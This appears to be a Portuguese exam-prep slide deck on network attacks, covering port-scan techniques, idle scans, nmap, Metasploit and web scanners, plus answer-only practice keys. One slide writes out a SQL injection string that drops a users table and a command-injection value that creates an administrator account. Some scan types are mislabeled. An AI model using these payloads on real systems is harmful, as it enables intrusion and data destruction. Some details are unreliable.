TCP Connect:
Cliente envia um pacote SYN para a porta;
Caso o servidor aceite a conexão, a porta está aberta;
Caso contrário, a porta está fechada.
TCP SYN (half open):
Cliente envia um pacote SYN para a porta;
Caso o servidor responda com SYN-ACK, o cliente envia RST – a conexão é encerrada antes do seu estabelecimento.
![Page 139: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/139.jpg)
Ataques em redes de computadores
UDP:
Cliente envia um pacote UDP de 0 byte para a porta;
Caso o servidor envie um pacote ICMP Port Unreachable, a porta está fechada;
Caso contrário, a porta está aberta.
FIN:
Modo stealth, ou seja, são mais difíceis de serem detectados;
Pacote FIN é enviado para a porta do servidor;
Caso um pacote RST é recebido, a porta está fechada.
![Page 140: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/140.jpg)
Ataques em redes de computadores
Null Scan:
Modo stealth;
Pacote FIN, sem nenhum flag, é enviado para a porta do servidor;
Caso um pacote RST é recebido, a porta está fechada.
FIN:
Modo stealth;
Pacote FIN com os flags FIN, PUSH e URG ativados é enviado para a porta do servidor;
Caso um pacote RST é recebido, a porta está fechada.
![Page 141: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/141.jpg)
Ataques em redes de computadoresIdle Scan
Técnica utilizada para fazer escaneamento oculto
Se baseia na avaliação do contado de pacote IP (IPID) do protocolo TCP/IP
Previamente ele manda um SYN para um host Zumbi e determina qual o IPID atual dele.
O atacante manda um pacote SYN para o alvo, com o IP spoofado do host Zumbi, direcionado a porta que ele deseja testar se está aberta ou não.
Depois o hacker testa novamente o atual IPID do host Zumbi
Se houve incremendo do IPID então a porta está aberta, pois o host alvo respondeu para o zumbi com um “SYN-ACK”
Se não houver incremento a porta está fechada, pois o host respondeu ao Zumbi com um pacote “RST”
Caso haja um IPS no host alvo apenas aparecerá os logs dos pacotes do zumbi, mas não do atacante real
![Page 142: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/142.jpg)
Ataques em redes de computadores
Idle Scan (cont.)
![Page 143: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/143.jpg)
Ataques em redes de computadores
Ferramentas para escanemento
NMAP - A mais popular das ferramentas para escanemento
Muito versátil, possui diversos recursos para descoberta de vulnerabilidades e “bypass” de IDS / IPS
![Page 144: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/144.jpg)
Ataques em redes de computadores# nmap -A -T4 scanme.nmap.org playground
Starting nmap ( http://insecure.org/nmap/ )Interesting ports on scanme.nmap.org (205.217.153.62):(The 1663 ports scanned but not shown below are in state: filtered)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)53/tcp open domain70/tcp closed gopher80/tcp open http Apache httpd 2.0.52 ((Fedora))113/tcp closed authDevice type: general purposeRunning: Linux 2.4.X|2.5.X|2.6.XOS details: Linux 2.4.7 - 2.6.11, Linux 2.6.0 - 2.6.11Uptime 33.908 days (since Thu Jul 21 03:38:03 2005)
Interesting ports on playground.nmap.org (192.168.0.40):(The 1659 ports scanned but not shown below are in state: closed)PORT STATE SERVICE VERSION135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn389/tcp open ldap?445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds1002/tcp open windows-icfw?1025/tcp open msrpc Microsoft Windows RPC1720/tcp open H.323/Q.931 CompTek AquaGateKeeper5800/tcp open vnc-http RealVNC 4.0 (Resolution 400x250; VNC TCP port: 5900)5900/tcp open vnc VNC (protocol 3.8)MAC Address: 00:A0:CC:63:85:4B (Lite-on Communications)Device type: general purposeRunning: Microsoft Windows NT/2K/XPOS details: Microsoft Windows XP Pro RC1+ through final releaseService Info: OSs: Windows, Windows XP
Nmap finished: 2 IP addresses (2 hosts up) scanned in 88.392 seconds
![Page 145: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/145.jpg)
Ataques em redes de computadoresNMAP - Opções mais comuns
-sP - Ping Scan - Procura hosts através de ICMP
-P0 - Não faz mais um ICMP discovery prévio
-sS (TCP SYN), -sT (Connect), -sA (ACK), sU (Scan UDP ports)
-sI - Idle Scan
-p Lista de portas a escanear (se for omitido escaneará as chamadas Well Known ports)
-sV - Tenta obter informações sobre o serviço rodando nas portas abertas
-O - OS Fingerprint detection
-T[0-5] - Regula a velocidade dos scans
-f - Fragmentar pacotes
-D - Decoy
-S <ip_address> - Spoofar o IP
![Page 146: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/146.jpg)
Ataques em redes de computadores
Ferramentas para atacar - Metasploit Framework
Consite em um framework completo, com diversos exploit prontos para uso, ferramentas para descoberta de novas vulnerabilidades, dentre outros
Muito utilizado por hackers, auditores de segurança e estudantes da área
De simples utilização (pode até mesmo ser automatizado)
Novos exploits são adicionados diáriamente e suas atualizações são gratúitas
Faz parte da distribuição Linux “Backtrack”
![Page 147: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/147.jpg)
Ataques em redes de computadores
![Page 148: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/148.jpg)
Ataques em redes de computadores
Ferramentas para ataques em Web App
Nikto
Scanner de vulnerabilidades em servidores WEB
Muito útil para descobrir fraquezas e erros de configuração em servidores WEB
Simples de usar
Faz parte do “Backtrack”
Algumas informações podem também ser obtidas com um telnet paras a porta do servidor WEB e um comando HTTP (exemplo HEAD/HTTP/1.0 pode retornar o banner do servidor)
![Page 149: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/149.jpg)
Ataques em redes de computadores
![Page 150: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/150.jpg)
Ataques em redes de computadoresAtaques de injeção
Em algumas situações é possível injetar informações em formulários e alterar o comportamento de uma aplicação. Os tipos mais comuns são
Injeção SQL - Atua modificando uma requisição legítima de SQL (ex: Fazer a autenticação de um usuário) para outra a escolha o hacker.
Ex: Consulta SQL normal: select * from user where senha =<Formulario>;
Ao digitarmos no formulário WEB a consulta abaixo no lugar da senha:
‘ or 1=1 --; droptable(<nome_tabela>);
Ao invés de fazer uma tentativa de login nós apagaremos a tabela de usuários.
Injeção de comandos - Comum em sistemas que executam comandos remotos e pedem o parametro por um formulário web (exemplo: traceroute para um destino definido pelo formulário). Se ao invés do IP fosse digitado:
; net user /add hacker hacker | net localgroup administrator hacker;
Ao invés de fazermos o traceroute nós criariamos um usuário, com acesso total (pois seria administrador), podendo conceder acesso via Remote Desktop (se fosse linux bastaria criar um usuário, clocar no grupo root e acessar via SSH).
![Page 151: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/151.jpg)
Ataques em redes de computadores
Ferramentas para ataques em Web App
Dirbuster
Ferramenta que descobre arquivos hospedados em um servidor WEB, mesmo que estejam ocultos, com um uso de um arquivo de dicionário
Testa o servidor WEB procurando erros. Se tentar acessar determinado arquivo e receber uma mensagem, dizendo que o arquivo existe, mesmo que não seja possível acesso a ele, o mesmo será exibido em uma listagem.
![Page 152: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/152.jpg)
Ataques em redes de computadores
![Page 153: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/153.jpg)
Questões para praticar
![Page 154: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/154.jpg)
Questões para praticar
Resposta: C
![Page 155: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/155.jpg)
Questões para praticar
Respostas: A,B,C,D. Sam Spade é um pacote de ferramentas antigo, que pode fazer ping, traceroute e outras funções. Cheops é uma ferramenta de monitoramento de rede.
![Page 156: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/156.jpg)
Questões para praticar
Resposta: B
![Page 157: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/157.jpg)
Questões para praticar
Respostas: A, C, E
![Page 158: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/158.jpg)
Questões para praticar
Resposta: A - Usuários administradores tem sempre seu RID (relative identifier) começando com 500
![Page 159: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/159.jpg)
Questões para praticar
Resposta: D
![Page 160: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/160.jpg)
Questões para praticar
Resposta: C
![Page 161: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/161.jpg)
Questões para praticar
Resposta: C
![Page 162: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/162.jpg)
Questões para praticar
Resposta: C
![Page 163: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/163.jpg)
Questões para praticar
Resposta: A
![Page 164: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/164.jpg)
Questões para praticar
Respostas: A e B
![Page 165: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/165.jpg)
Questões para praticar
Resposta: E
![Page 166: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/166.jpg)
Questões para praticar
Resposta: D
![Page 167: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/167.jpg)
Questões para praticar
Resposta: C
![Page 168: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/168.jpg)
Questões para praticar
Respostas: A e B. Notar que os 8 caracteres são identicos
![Page 169: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/169.jpg)
Questões para praticar
Resposta: D
![Page 170: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/170.jpg)
Questões para praticar
Resposta: A
![Page 171: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/171.jpg)
Questões para praticar
Resposta: D
![Page 172: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/172.jpg)
Questões para praticar
Resposta: E
![Page 173: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/173.jpg)
Questões para praticar
Resposta: B - Consultar a tabela ASCII para entender a linha “0B0”
![Page 174: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/174.jpg)
Questões para praticar
Resposta: B
![Page 175: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/175.jpg)
Questões para praticar
Resposta: C - Converter o número para binário, depois pegar os últimos 8 bits e converter para decimal, obtendo o .5
![Page 176: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/176.jpg)
Questões para praticar
Resposta: A
![Page 177: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/177.jpg)
Questões para praticar
Resposta: A
![Page 178: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/178.jpg)
Questões para praticar
Resposta: A
![Page 179: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/179.jpg)
Questões para praticar
Revisão de provas da PF
![Page 180: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/180.jpg)
FIM